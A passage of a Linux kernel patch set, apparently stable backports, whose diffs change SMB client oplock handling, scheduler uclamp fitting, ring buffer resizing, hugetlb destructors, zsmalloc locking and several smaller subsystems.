+ 	bool purge_cache = false, oplock_break_cancelled;
+ 	__u64 persistent_fid, volatile_fid;
+@@ -5093,6 +5095,12 @@ void cifs_oplock_break(struct work_struct *work)
+ 	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
+ 			TASK_UNINTERRUPTIBLE);
+ 
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		goto out;
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
+ 	server->ops->downgrade_oplock(server, cinode, cfile->oplock_level,
+ 				      cfile->oplock_epoch, &purge_cache);
+ 
+@@ -5142,18 +5150,19 @@ oplock_break_ack:
+ 	/*
+ 	 * MS-SMB2 3.2.5.19.1 and 3.2.5.19.2 (and MS-CIFS 3.2.5.42) do not require
+ 	 * an acknowledgment to be sent when the file has already been closed.
+-	 * check for server null, since can race with kill_sb calling tree disconnect.
+ 	 */
+ 	spin_lock(&cinode->open_file_lock);
+-	if (tcon->ses && tcon->ses->server && !oplock_break_cancelled &&
+-					!list_empty(&cinode->openFileList)) {
++	/* check list empty since can race with kill_sb calling tree disconnect */
++	if (!oplock_break_cancelled && !list_empty(&cinode->openFileList)) {
+ 		spin_unlock(&cinode->open_file_lock);
+-		rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
+-						volatile_fid, net_fid, cinode);
++		rc = server->ops->oplock_response(tcon, persistent_fid,
++						  volatile_fid, net_fid, cinode);
+ 		cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
+ 	} else
+ 		spin_unlock(&cinode->open_file_lock);
+ 
++	cifs_put_tlink(tlink);
++out:
+ 	cifs_done_oplock_break(cinode);
+ }
+ 
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index 3ca593cdda76e..ba46156e32680 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -3841,6 +3841,12 @@ void smb2_reconnect_server(struct work_struct *work)
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		spin_lock(&ses->ses_lock);
++		if (ses->ses_status == SES_EXITING) {
++			spin_unlock(&ses->ses_lock);
++			continue;
++		}
++		spin_unlock(&ses->ses_lock);
+ 
+ 		tcon_selected = false;
+ 
+diff --git a/include/kvm/arm_vgic.h b/include/kvm/arm_vgic.h
+index 4df9e73a8bb5f..1d7d4cffaefc6 100644
+--- a/include/kvm/arm_vgic.h
++++ b/include/kvm/arm_vgic.h
+@@ -429,6 +429,6 @@ int kvm_vgic_v4_unset_forwarding(struct kvm *kvm, int irq,
+ 
+ int vgic_v4_load(struct kvm_vcpu *vcpu);
+ void vgic_v4_commit(struct kvm_vcpu *vcpu);
+-int vgic_v4_put(struct kvm_vcpu *vcpu, bool need_db);
++int vgic_v4_put(struct kvm_vcpu *vcpu);
+ 
+ #endif /* __KVM_ARM_VGIC_H */
+diff --git a/include/linux/iopoll.h b/include/linux/iopoll.h
+index 2c8860e406bd8..0417360a6db9b 100644
+--- a/include/linux/iopoll.h
++++ b/include/linux/iopoll.h
+@@ -53,6 +53,7 @@
+ 		} \
+ 		if (__sleep_us) \
+ 			usleep_range((__sleep_us >> 2) + 1, __sleep_us); \
++		cpu_relax(); \
+ 	} \
+ 	(cond) ? 0 : -ETIMEDOUT; \
+ })
+@@ -95,6 +96,7 @@
+ 		} \
+ 		if (__delay_us) \
+ 			udelay(__delay_us); \
++		cpu_relax(); \
+ 	} \
+ 	(cond) ? 0 : -ETIMEDOUT; \
+ })
+diff --git a/include/linux/virtio_net.h b/include/linux/virtio_net.h
+index a960de68ac69e..6047058d67037 100644
+--- a/include/linux/virtio_net.h
++++ b/include/linux/virtio_net.h
+@@ -148,6 +148,10 @@ retry:
+ 		if (gso_type & SKB_GSO_UDP)
+ 			nh_off -= thlen;
+ 
++		/* Kernel has a special handling for GSO_BY_FRAGS. */
++		if (gso_size == GSO_BY_FRAGS)
++			return -EINVAL;
++
+ 		/* Too small packets are not really GSO ones. */
+ 		if (skb->len - nh_off > gso_size) {
+ 			shinfo->gso_size = gso_size;
+diff --git a/include/media/v4l2-mem2mem.h b/include/media/v4l2-mem2mem.h
+index bb9de6a899e07..d6c8eb2b52019 100644
+--- a/include/media/v4l2-mem2mem.h
++++ b/include/media/v4l2-mem2mem.h
+@@ -593,7 +593,14 @@ void v4l2_m2m_buf_queue(struct v4l2_m2m_ctx *m2m_ctx,
+ static inline
+ unsigned int v4l2_m2m_num_src_bufs_ready(struct v4l2_m2m_ctx *m2m_ctx)
+ {
+-	return m2m_ctx->out_q_ctx.num_rdy;
++	unsigned int num_buf_rdy;
++	unsigned long flags;
++
++	spin_lock_irqsave(&m2m_ctx->out_q_ctx.rdy_spinlock, flags);
++	num_buf_rdy = m2m_ctx->out_q_ctx.num_rdy;
++	spin_unlock_irqrestore(&m2m_ctx->out_q_ctx.rdy_spinlock, flags);
++
++	return num_buf_rdy;
+ }
+ 
+ /**
+@@ -605,7 +612,14 @@ unsigned int v4l2_m2m_num_src_bufs_ready(struct v4l2_m2m_ctx *m2m_ctx)
+ static inline
+ unsigned int v4l2_m2m_num_dst_bufs_ready(struct v4l2_m2m_ctx *m2m_ctx)
+ {
+-	return m2m_ctx->cap_q_ctx.num_rdy;
++	unsigned int num_buf_rdy;
++	unsigned long flags;
++
++	spin_lock_irqsave(&m2m_ctx->cap_q_ctx.rdy_spinlock, flags);
++	num_buf_rdy = m2m_ctx->cap_q_ctx.num_rdy;
++	spin_unlock_irqrestore(&m2m_ctx->cap_q_ctx.rdy_spinlock, flags);
++
++	return num_buf_rdy;
+ }
+ 
+ /**
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 1bbdddcf61542..699408944952c 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1445,6 +1445,12 @@ static inline bool sk_has_memory_pressure(const struct sock *sk)
+ 	return sk->sk_prot->memory_pressure != NULL;
+ }
+ 
++static inline bool sk_under_global_memory_pressure(const struct sock *sk)
++{
++	return sk->sk_prot->memory_pressure &&
++		!!*sk->sk_prot->memory_pressure;
++}
++
+ static inline bool sk_under_memory_pressure(const struct sock *sk)
+ {
+ 	if (!sk->sk_prot->memory_pressure)
+diff --git a/kernel/dma/remap.c b/kernel/dma/remap.c
+index b4526668072e7..27596f3b4aef3 100644
+--- a/kernel/dma/remap.c
++++ b/kernel/dma/remap.c
+@@ -43,13 +43,13 @@ void *dma_common_contiguous_remap(struct page *page, size_t size,
+ 	void *vaddr;
+ 	int i;
+ 
+-	pages = kmalloc_array(count, sizeof(struct page *), GFP_KERNEL);
++	pages = kvmalloc_array(count, sizeof(struct page *), GFP_KERNEL);
+ 	if (!pages)
+ 		return NULL;
+ 	for (i = 0; i < count; i++)
+ 		pages[i] = nth_page(page, i);
+ 	vaddr = vmap(pages, count, VM_DMA_COHERENT, prot);
+-	kfree(pages);
++	kvfree(pages);
+ 
+ 	return vaddr;
+ }
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 5e5aea2360a87..612873ec2197f 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4464,17 +4464,9 @@ static inline int util_fits_cpu(unsigned long util,
+ 	 *
+ 	 * For uclamp_max, we can tolerate a drop in performance level as the
+ 	 * goal is to cap the task. So it's okay if it's getting less.
+-	 *
+-	 * In case of capacity inversion we should honour the inverted capacity
+-	 * for both uclamp_min and uclamp_max all the time.
+ 	 */
+-	capacity_orig = cpu_in_capacity_inversion(cpu);
+-	if (capacity_orig) {
+-		capacity_orig_thermal = capacity_orig;
+-	} else {
+-		capacity_orig = capacity_orig_of(cpu);
+-		capacity_orig_thermal = capacity_orig - arch_scale_thermal_pressure(cpu);
+-	}
++	capacity_orig = capacity_orig_of(cpu);
++	capacity_orig_thermal = capacity_orig - arch_scale_thermal_pressure(cpu);
+ 
+ 	/*
+ 	 * We want to force a task to fit a cpu as implied by uclamp_max.
+@@ -4549,8 +4541,8 @@ static inline int util_fits_cpu(unsigned long util,
+ 	 * handle the case uclamp_min > uclamp_max.
+ 	 */
+ 	uclamp_min = min(uclamp_min, uclamp_max);
+-	if (util < uclamp_min && capacity_orig != SCHED_CAPACITY_SCALE)
+-		fits = fits && (uclamp_min <= capacity_orig_thermal);
++	if (fits && (util < uclamp_min) && (uclamp_min > capacity_orig_thermal))
++		return -1;
+ 
+ 	return fits;
+ }
+@@ -4560,7 +4552,11 @@ static inline int task_fits_cpu(struct task_struct *p, int cpu)
+ 	unsigned long uclamp_min = uclamp_eff_value(p, UCLAMP_MIN);
+ 	unsigned long uclamp_max = uclamp_eff_value(p, UCLAMP_MAX);
+ 	unsigned long util = task_util_est(p);
+-	return util_fits_cpu(util, uclamp_min, uclamp_max, cpu);
++	/*
++	 * Return true only if the cpu fully fits the task requirements, which
++	 * include the utilization but also the performance hints.
++	 */
++	return (util_fits_cpu(util, uclamp_min, uclamp_max, cpu) > 0);
+ }
+ 
+ static inline void update_misfit_status(struct task_struct *p, struct rq *rq)
+@@ -6043,6 +6039,7 @@ static inline bool cpu_overutilized(int cpu)
+ 	unsigned long rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
+ 	unsigned long rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
+ 
++	/* Return true only if the utilization doesn't fit CPU's capacity */
+ 	return !util_fits_cpu(cpu_util_cfs(cpu), rq_util_min, rq_util_max, cpu);
+ }
+ 
+@@ -6836,6 +6833,7 @@ static int
+ select_idle_capacity(struct task_struct *p, struct sched_domain *sd, int target)
+ {
+ 	unsigned long task_util, util_min, util_max, best_cap = 0;
++	int fits, best_fits = 0;
+ 	int cpu, best_cpu = -1;
+ 	struct cpumask *cpus;
+ 
+@@ -6851,12 +6849,28 @@ select_idle_capacity(struct task_struct *p, struct sched_domain *sd, int target)
+ 
+ 		if (!available_idle_cpu(cpu) && !sched_idle_cpu(cpu))
+ 			continue;
+-		if (util_fits_cpu(task_util, util_min, util_max, cpu))
++
++		fits = util_fits_cpu(task_util, util_min, util_max, cpu);
++
++		/* This CPU fits with all requirements */
++		if (fits > 0)
+ 			return cpu;
++		/*
++		 * Only the min performance hint (i.e. uclamp_min) doesn't fit.
++		 * Look for the CPU with best capacity.
++		 */
++		else if (fits < 0)
++			cpu_cap = capacity_orig_of(cpu) - thermal_load_avg(cpu_rq(cpu));
+ 
+-		if (cpu_cap > best_cap) {
++		/*
++		 * First, select CPU which fits better (-1 being better than 0).
++		 * Then, select the one with best capacity at same level.
++		 */
++		if ((fits < best_fits) ||
++		    ((fits == best_fits) && (cpu_cap > best_cap))) {
+ 			best_cap = cpu_cap;
+ 			best_cpu = cpu;
++			best_fits = fits;
+ 		}
+ 	}
+ 
+@@ -6869,7 +6883,11 @@ static inline bool asym_fits_cpu(unsigned long util,
+ 				 int cpu)
+ {
+ 	if (sched_asym_cpucap_active())
+-		return util_fits_cpu(util, util_min, util_max, cpu);
++		/*
++		 * Return true only if the cpu fully fits the task requirements
++		 * which include the utilization and the performance hints.
++		 */
++		return (util_fits_cpu(util, util_min, util_max, cpu) > 0);
+ 
+ 	return true;
+ }
+@@ -7236,6 +7254,9 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	unsigned long p_util_max = uclamp_is_used() ? uclamp_eff_value(p, UCLAMP_MAX) : 1024;
+ 	struct root_domain *rd = this_rq()->rd;
+ 	int cpu, best_energy_cpu, target = -1;
++	int prev_fits = -1, best_fits = -1;
++	unsigned long best_thermal_cap = 0;
++	unsigned long prev_thermal_cap = 0;
+ 	struct sched_domain *sd;
+ 	struct perf_domain *pd;
+ 	struct energy_env eenv;
+@@ -7271,6 +7292,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 		unsigned long prev_spare_cap = 0;
+ 		int max_spare_cap_cpu = -1;
+ 		unsigned long base_energy;
++		int fits, max_fits = -1;
+ 
+ 		cpumask_and(cpus, perf_domain_span(pd), cpu_online_mask);
+ 
+@@ -7320,7 +7342,9 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 				util_min = max(rq_util_min, p_util_min);
+ 				util_max = max(rq_util_max, p_util_max);
+ 			}
+-			if (!util_fits_cpu(util, util_min, util_max, cpu))
++
++			fits = util_fits_cpu(util, util_min, util_max, cpu);
++			if (!fits)
+ 				continue;
+ 
+ 			lsub_positive(&cpu_cap, util);
+@@ -7328,7 +7352,9 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 			if (cpu == prev_cpu) {
+ 				/* Always use prev_cpu as a candidate. */
+ 				prev_spare_cap = cpu_cap;
+-			} else if (cpu_cap > max_spare_cap) {
++				prev_fits = fits;
++			} else if ((fits > max_fits) ||
++				   ((fits == max_fits) && (cpu_cap > max_spare_cap))) {
+ 				/*
+ 				 * Find the CPU with the maximum spare capacity
+ 				 * among the remaining CPUs in the performance
+@@ -7336,6 +7362,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 				 */
+ 				max_spare_cap = cpu_cap;
+ 				max_spare_cap_cpu = cpu;
++				max_fits = fits;
+ 			}
+ 		}
+ 
+@@ -7354,26 +7381,50 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 			if (prev_delta < base_energy)
+ 				goto unlock;
+ 			prev_delta -= base_energy;
++			prev_thermal_cap = cpu_thermal_cap;
+ 			best_delta = min(best_delta, prev_delta);
+ 		}
+ 
+ 		/* Evaluate the energy impact of using max_spare_cap_cpu. */
+ 		if (max_spare_cap_cpu >= 0 && max_spare_cap > prev_spare_cap) {
++			/* Current best energy cpu fits better */
++			if (max_fits < best_fits)
++				continue;
++
++			/*
++			 * Both don't fit performance hint (i.e. uclamp_min)
++			 * but best energy cpu has better capacity.
++			 */
++			if ((max_fits < 0) &&
++			    (cpu_thermal_cap <= best_thermal_cap))
++				continue;
++
+ 			cur_delta = compute_energy(&eenv, pd, cpus, p,
+ 						   max_spare_cap_cpu);
+ 			/* CPU utilization has changed */
+ 			if (cur_delta < base_energy)
+ 				goto unlock;
+ 			cur_delta -= base_energy;
+-			if (cur_delta < best_delta) {
+-				best_delta = cur_delta;
+-				best_energy_cpu = max_spare_cap_cpu;
+-			}
++
++			/*
++			 * Both fit for the task but best energy cpu has lower
++			 * energy impact.
++			 */
++			if ((max_fits > 0) && (best_fits > 0) &&
++			    (cur_delta >= best_delta))
++				continue;
++
++			best_delta = cur_delta;
++			best_energy_cpu = max_spare_cap_cpu;
++			best_fits = max_fits;
++			best_thermal_cap = cpu_thermal_cap;
+ 		}
+ 	}
+ 	rcu_read_unlock();
+ 
+-	if (best_delta < prev_delta)
++	if ((best_fits > prev_fits) ||
++	    ((best_fits > 0) && (best_delta < prev_delta)) ||
++	    ((best_fits < 0) && (best_thermal_cap > prev_thermal_cap)))
+ 		target = best_energy_cpu;
+ 
+ 	return target;
+@@ -8870,82 +8921,16 @@ static unsigned long scale_rt_capacity(int cpu)
+ 
+ static void update_cpu_capacity(struct sched_domain *sd, int cpu)
+ {
+-	unsigned long capacity_orig = arch_scale_cpu_capacity(cpu);
+ 	unsigned long capacity = scale_rt_capacity(cpu);
+ 	struct sched_group *sdg = sd->groups;
+-	struct rq *rq = cpu_rq(cpu);
+ 
+-	rq->cpu_capacity_orig = capacity_orig;
++	cpu_rq(cpu)->cpu_capacity_orig = arch_scale_cpu_capacity(cpu);
+ 
+ 	if (!capacity)
+ 		capacity = 1;
+ 
+-	rq->cpu_capacity = capacity;
+-
+-	/*
+-	 * Detect if the performance domain is in capacity inversion state.
+-	 *
+-	 * Capacity inversion happens when another perf domain with equal or
+-	 * lower capacity_orig_of() ends up having higher capacity than this
+-	 * domain after subtracting thermal pressure.
+-	 *
+-	 * We only take into account thermal pressure in this detection as it's
+-	 * the only metric that actually results in *real* reduction of
+-	 * capacity due to performance points (OPPs) being dropped/become
+-	 * unreachable due to thermal throttling.
+-	 *
+-	 * We assume:
+-	 *   * That all cpus in a perf domain have the same capacity_orig
+-	 *     (same uArch).
+-	 *   * Thermal pressure will impact all cpus in this perf domain
+-	 *     equally.
+-	 */
+-	if (sched_energy_enabled()) {
+-		unsigned long inv_cap = capacity_orig - thermal_load_avg(rq);
+-		struct perf_domain *pd;
+-
+-		rcu_read_lock();
+-
+-		pd = rcu_dereference(rq->rd->pd);
+-		rq->cpu_capacity_inverted = 0;
+-
+-		for (; pd; pd = pd->next) {
+-			struct cpumask *pd_span = perf_domain_span(pd);
+-			unsigned long pd_cap_orig, pd_cap;
+-
+-			/* We can't be inverted against our own pd */
+-			if (cpumask_test_cpu(cpu_of(rq), pd_span))
+-				continue;
+-
+-			cpu = cpumask_any(pd_span);
+-			pd_cap_orig = arch_scale_cpu_capacity(cpu);
+-
+-			if (capacity_orig < pd_cap_orig)
+-				continue;
+-
+-			/*
+-			 * handle the case of multiple perf domains have the
+-			 * same capacity_orig but one of them is under higher
+-			 * thermal pressure. We record it as capacity
+-			 * inversion.
+-			 */
+-			if (capacity_orig == pd_cap_orig) {
+-				pd_cap = pd_cap_orig - thermal_load_avg(cpu_rq(cpu));
+-
+-				if (pd_cap > inv_cap) {
+-					rq->cpu_capacity_inverted = inv_cap;
+-					break;
+-				}
+-			} else if (pd_cap_orig > inv_cap) {
+-				rq->cpu_capacity_inverted = inv_cap;
+-				break;
+-			}
+-		}
+-
+-		rcu_read_unlock();
+-	}
+-
+-	trace_sched_cpu_capacity_tp(rq);
++	cpu_rq(cpu)->cpu_capacity = capacity;
++	trace_sched_cpu_capacity_tp(cpu_rq(cpu));
+ 
+ 	sdg->sgc->capacity = capacity;
+ 	sdg->sgc->min_capacity = capacity;
+@@ -10183,24 +10168,23 @@ static struct sched_group *find_busiest_group(struct lb_env *env)
+ 	 */
+ 	update_sd_lb_stats(env, &sds);
+ 
+-	if (sched_energy_enabled()) {
+-		struct root_domain *rd = env->dst_rq->rd;
+-
+-		if (rcu_dereference(rd->pd) && !READ_ONCE(rd->overutilized))
+-			goto out_balanced;
+-	}
+-
+-	local = &sds.local_stat;
+-	busiest = &sds.busiest_stat;
+-
+ 	/* There is no busy sibling group to pull tasks from */
+ 	if (!sds.busiest)
+ 		goto out_balanced;
+ 
++	busiest = &sds.busiest_stat;
++
+ 	/* Misfit tasks should be dealt with regardless of the avg load */
+ 	if (busiest->group_type == group_misfit_task)
+ 		goto force_balance;
+ 
++	if (sched_energy_enabled()) {
++		struct root_domain *rd = env->dst_rq->rd;
++
++		if (rcu_dereference(rd->pd) && !READ_ONCE(rd->overutilized))
++			goto out_balanced;
++	}
++
+ 	/* ASYM feature bypasses nice load balance check */
+ 	if (busiest->group_type == group_asym_packing)
+ 		goto force_balance;
+@@ -10213,6 +10197,7 @@ static struct sched_group *find_busiest_group(struct lb_env *env)
+ 	if (busiest->group_type == group_imbalanced)
+ 		goto force_balance;
+ 
++	local = &sds.local_stat;
+ 	/*
+ 	 * If the local group is busier than the selected busiest group
+ 	 * don't try and pull any tasks.
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index 5f18460f62f0f..d6d488e8eb554 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -1041,7 +1041,6 @@ struct rq {
+ 
+ 	unsigned long		cpu_capacity;
+ 	unsigned long		cpu_capacity_orig;
+-	unsigned long		cpu_capacity_inverted;
+ 
+ 	struct balance_callback *balance_callback;
+ 
+@@ -2879,24 +2878,6 @@ static inline unsigned long capacity_orig_of(int cpu)
+ 	return cpu_rq(cpu)->cpu_capacity_orig;
+ }
+ 
+-/*
+- * Returns inverted capacity if the CPU is in capacity inversion state.
+- * 0 otherwise.
+- *
+- * Capacity inversion detection only considers thermal impact where actual
+- * performance points (OPPs) gets dropped.
+- *
+- * Capacity inversion state happens when another performance domain that has
+- * equal or lower capacity_orig_of() becomes effectively larger than the perf
+- * domain this CPU belongs to due to thermal pressure throttling it hard.
+- *
+- * See comment in update_cpu_capacity().
+- */
+-static inline unsigned long cpu_in_capacity_inversion(int cpu)
+-{
+-	return cpu_rq(cpu)->cpu_capacity_inverted;
+-}
+-
+ /**
+  * enum cpu_util_type - CPU utilization type
+  * @FREQUENCY_UTIL:	Utilization used to select frequency
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index c49ed619a64dd..de55107aef5d5 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -544,6 +544,7 @@ struct trace_buffer {
+ 	unsigned			flags;
+ 	int				cpus;
+ 	atomic_t			record_disabled;
++	atomic_t			resizing;
+ 	cpumask_var_t			cpumask;
+ 
+ 	struct lock_class_key		*reader_lock_key;
+@@ -2173,7 +2174,7 @@ int ring_buffer_resize(struct trace_buffer *buffer, unsigned long size,
+ 
+ 	/* prevent another thread from changing buffer sizes */
+ 	mutex_lock(&buffer->mutex);
+-
++	atomic_inc(&buffer->resizing);
+ 
+ 	if (cpu_id == RING_BUFFER_ALL_CPUS) {
+ 		/*
+@@ -2312,6 +2313,7 @@ int ring_buffer_resize(struct trace_buffer *buffer, unsigned long size,
+ 		atomic_dec(&buffer->record_disabled);
+ 	}
+ 
++	atomic_dec(&buffer->resizing);
+ 	mutex_unlock(&buffer->mutex);
+ 	return 0;
+ 
+@@ -2332,6 +2334,7 @@ int ring_buffer_resize(struct trace_buffer *buffer, unsigned long size,
+ 		}
+ 	}
+  out_err_unlock:
++	atomic_dec(&buffer->resizing);
+ 	mutex_unlock(&buffer->mutex);
+ 	return err;
+ }
+@@ -5539,6 +5542,15 @@ int ring_buffer_swap_cpu(struct trace_buffer *buffer_a,
+ 	if (local_read(&cpu_buffer_b->committing))
+ 		goto out_dec;
+ 
++	/*
++	 * When resize is in progress, we cannot swap it because
++	 * it will mess the state of the cpu buffer.
++	 */
++	if (atomic_read(&buffer_a->resizing))
++		goto out_dec;
++	if (atomic_read(&buffer_b->resizing))
++		goto out_dec;
++
+ 	buffer_a->buffers[cpu] = cpu_buffer_b;
+ 	buffer_b->buffers[cpu] = cpu_buffer_a;
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 709af9631be45..af33c5a4166d4 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1885,9 +1885,10 @@ update_max_tr_single(struct trace_array *tr, struct task_struct *tsk, int cpu)
+ 		 * place on this CPU. We fail to record, but we reset
+ 		 * the max trace buffer (no one writes directly to it)
+ 		 * and flag that it failed.
++		 * Another reason is resize is in progress.
+ 		 */
+ 		trace_array_printk_buf(tr->max_buffer.buffer, _THIS_IP_,
+-			"Failed to swap buffers due to commit in progress\n");
++			"Failed to swap buffers due to commit or resize in progress\n");
+ 	}
+ 
+ 	WARN_ON_ONCE(ret && ret != -EAGAIN && ret != -EBUSY);
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index d3ffa0fd49e57..c38ec6efec0f7 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -1581,9 +1581,37 @@ static inline void destroy_compound_gigantic_page(struct page *page,
+ 						unsigned int order) { }
+ #endif
+ 
++static inline void __clear_hugetlb_destructor(struct hstate *h,
++						struct page *page)
++{
++	lockdep_assert_held(&hugetlb_lock);
++
++	/*
++	 * Very subtle
++	 *
++	 * For non-gigantic pages set the destructor to the normal compound
++	 * page dtor.  This is needed in case someone takes an additional
++	 * temporary ref to the page, and freeing is delayed until they drop
++	 * their reference.
++	 *
++	 * For gigantic pages set the destructor to the null dtor.  This
++	 * destructor will never be called.  Before freeing the gigantic
++	 * page destroy_compound_gigantic_folio will turn the folio into a
++	 * simple group of pages.  After this the destructor does not
++	 * apply.
++	 *
++	 */
++	if (hstate_is_gigantic(h))
++		set_compound_page_dtor(page, NULL_COMPOUND_DTOR);
++	else
++		set_compound_page_dtor(page, COMPOUND_PAGE_DTOR);
++}
++
+ /*
+- * Remove hugetlb page from lists, and update dtor so that page appears
+- * as just a compound page.
++ * Remove hugetlb page from lists.
++ * If vmemmap exists for the page, update dtor so that the page appears
++ * as just a compound page.  Otherwise, wait until after allocating vmemmap
++ * to update dtor.
+  *
+  * A reference is held on the page, except in the case of demote.
+  *
+@@ -1614,31 +1642,19 @@ static void __remove_hugetlb_page(struct hstate *h, struct page *page,
+ 	}
+ 
+ 	/*
+-	 * Very subtle
+-	 *
+-	 * For non-gigantic pages set the destructor to the normal compound
+-	 * page dtor.  This is needed in case someone takes an additional
+-	 * temporary ref to the page, and freeing is delayed until they drop
+-	 * their reference.
+-	 *
+-	 * For gigantic pages set the destructor to the null dtor.  This
+-	 * destructor will never be called.  Before freeing the gigantic
+-	 * page destroy_compound_gigantic_page will turn the compound page
+-	 * into a simple group of pages.  After this the destructor does not
+-	 * apply.
+-	 *
+-	 * This handles the case where more than one ref is held when and
+-	 * after update_and_free_page is called.
+-	 *
+-	 * In the case of demote we do not ref count the page as it will soon
+-	 * be turned into a page of smaller size.
++	 * We can only clear the hugetlb destructor after allocating vmemmap
++	 * pages.  Otherwise, someone (memory error handling) may try to write
++	 * to tail struct pages.
++	 */
++	if (!HPageVmemmapOptimized(page))
++		__clear_hugetlb_destructor(h, page);
++
++	 /*
++	  * In the case of demote we do not ref count the page as it will soon
++	  * be turned into a page of smaller size.
+ 	 */
+ 	if (!demote)
+ 		set_page_refcounted(page);
+-	if (hstate_is_gigantic(h))
+-		set_compound_page_dtor(page, NULL_COMPOUND_DTOR);
+-	else
+-		set_compound_page_dtor(page, COMPOUND_PAGE_DTOR);
+ 
+ 	h->nr_huge_pages--;
+ 	h->nr_huge_pages_node[nid]--;
+@@ -1706,6 +1722,7 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ {
+ 	int i;
+ 	struct page *subpage;
++	bool clear_dtor = HPageVmemmapOptimized(page);
+ 
+ 	if (hstate_is_gigantic(h) && !gigantic_page_runtime_supported())
+ 		return;
+@@ -1736,6 +1753,16 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ 	if (unlikely(PageHWPoison(page)))
+ 		hugetlb_clear_page_hwpoison(page);
+ 
++	/*
++	 * If vmemmap pages were allocated above, then we need to clear the
++	 * hugetlb destructor under the hugetlb lock.
++	 */
++	if (clear_dtor) {
++		spin_lock_irq(&hugetlb_lock);
++		__clear_hugetlb_destructor(h, page);
++		spin_unlock_irq(&hugetlb_lock);
++	}
++
+ 	for (i = 0; i < pages_per_huge_page(h); i++) {
+ 		subpage = nth_page(page, i);
+ 		subpage->flags &= ~(1 << PG_locked | 1 << PG_error |
+diff --git a/mm/zsmalloc.c b/mm/zsmalloc.c
+index d03941cace2c4..37f755c9a1b70 100644
+--- a/mm/zsmalloc.c
++++ b/mm/zsmalloc.c
+@@ -33,8 +33,7 @@
+ /*
+  * lock ordering:
+  *	page_lock
+- *	pool->migrate_lock
+- *	class->lock
++ *	pool->lock
+  *	zspage->lock
+  */
+ 
+@@ -192,7 +191,6 @@ static const int fullness_threshold_frac = 4;
+ static size_t huge_class_size;
+ 
+ struct size_class {
+-	spinlock_t lock;
+ 	struct list_head fullness_list[NR_ZS_FULLNESS];
+ 	/*
+ 	 * Size of objects stored in this class. Must be multiple
+@@ -247,8 +245,8 @@ struct zs_pool {
+ #ifdef CONFIG_COMPACTION
+ 	struct work_struct free_work;
+ #endif
+-	/* protect page/zspage migration */
+-	rwlock_t migrate_lock;
++	spinlock_t lock;
++	atomic_t compaction_in_progress;
+ };
+ 
+ struct zspage {
+@@ -355,7 +353,7 @@ static void cache_free_zspage(struct zs_pool *pool, struct zspage *zspage)
+ 	kmem_cache_free(pool->zspage_cachep, zspage);
+ }
+ 
+-/* class->lock(which owns the handle) synchronizes races */
++/* pool->lock(which owns the handle) synchronizes races */
+ static void record_obj(unsigned long handle, unsigned long obj)
+ {
+ 	*(unsigned long *)handle = obj;
+@@ -452,7 +450,7 @@ static __maybe_unused int is_first_page(struct page *page)
+ 	return PagePrivate(page);
+ }
+ 
+-/* Protected by class->lock */
++/* Protected by pool->lock */
+ static inline int get_zspage_inuse(struct zspage *zspage)
+ {
+ 	return zspage->inuse;
+@@ -597,13 +595,13 @@ static int zs_stats_size_show(struct seq_file *s, void *v)
+ 		if (class->index != i)
+ 			continue;
+ 
+-		spin_lock(&class->lock);
++		spin_lock(&pool->lock);
+ 		class_almost_full = zs_stat_get(class, CLASS_ALMOST_FULL);
+ 		class_almost_empty = zs_stat_get(class, CLASS_ALMOST_EMPTY);
+ 		obj_allocated = zs_stat_get(class, OBJ_ALLOCATED);
+ 		obj_used = zs_stat_get(class, OBJ_USED);
+ 		freeable = zs_can_compact(class);
+-		spin_unlock(&class->lock);
++		spin_unlock(&pool->lock);
+ 
+ 		objs_per_zspage = class->objs_per_zspage;
+ 		pages_used = obj_allocated / objs_per_zspage *
+@@ -916,7 +914,7 @@ static void __free_zspage(struct zs_pool *pool, struct size_class *class,
+ 
+ 	get_zspage_mapping(zspage, &class_idx, &fg);
+ 
+-	assert_spin_locked(&class->lock);
++	assert_spin_locked(&pool->lock);
+ 
+ 	VM_BUG_ON(get_zspage_inuse(zspage));
+ 	VM_BUG_ON(fg != ZS_EMPTY);
+@@ -1247,19 +1245,19 @@ void *zs_map_object(struct zs_pool *pool, unsigned long handle,
+ 	BUG_ON(in_interrupt());
+ 
+ 	/* It guarantees it can get zspage from handle safely */
+-	read_lock(&pool->migrate_lock);
++	spin_lock(&pool->lock);
+ 	obj = handle_to_obj(handle);
+ 	obj_to_location(obj, &page, &obj_idx);
+ 	zspage = get_zspage(page);
+ 
+ 	/*
+-	 * migration cannot move any zpages in this zspage. Here, class->lock
